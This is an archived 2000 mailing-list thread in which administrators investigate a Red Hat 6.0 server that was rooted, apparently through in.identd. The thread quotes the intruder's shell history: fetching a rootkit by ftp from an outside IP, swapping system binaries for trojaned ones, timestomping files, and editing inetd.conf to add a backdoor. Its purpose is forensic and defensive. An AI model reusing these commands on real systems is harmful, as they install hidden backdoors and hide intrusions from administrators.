Security Incidents mailing list archives

Re: Rooted through in.identd on Red Hat 6.0

From: sec () ORGONE NEGATION NET (jms)
Date: Thu, 20 Apr 2000 00:31:46 -0700


what other services were running?

im more inclined to think they gained entry through other means, trojaned
the box, then came in again to clean up the logs and forgot to nuke
the .bash_history.

the in.identd entries are explained by his ftp session, which was probably
to get the rootkit:

ftp 200.192.58.201 21  <-- from .bash_history
     ^^^^^^^^^^^^^^

Apr  8 23:15:57 home identd[12006]: Connection from 200.192.58.201
                                                    ^^^^^^^^^^^^^^
..from syslogs.

supply a list of daemons running at the time of the breakin, i suspect we
will see something known to be rootable.

-jason storm
 jms () negation net

/* hard work never killed noboby,
   but i aint takin no chances. */

Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from
200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from
200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del

Current thread:

Re: Rooted through in.identd on Red Hat 6.0 jms (Apr 20)
- <Possible follow-ups>
- Re: Rooted through in.identd on Red Hat 6.0 Jon Burdge (Apr 20)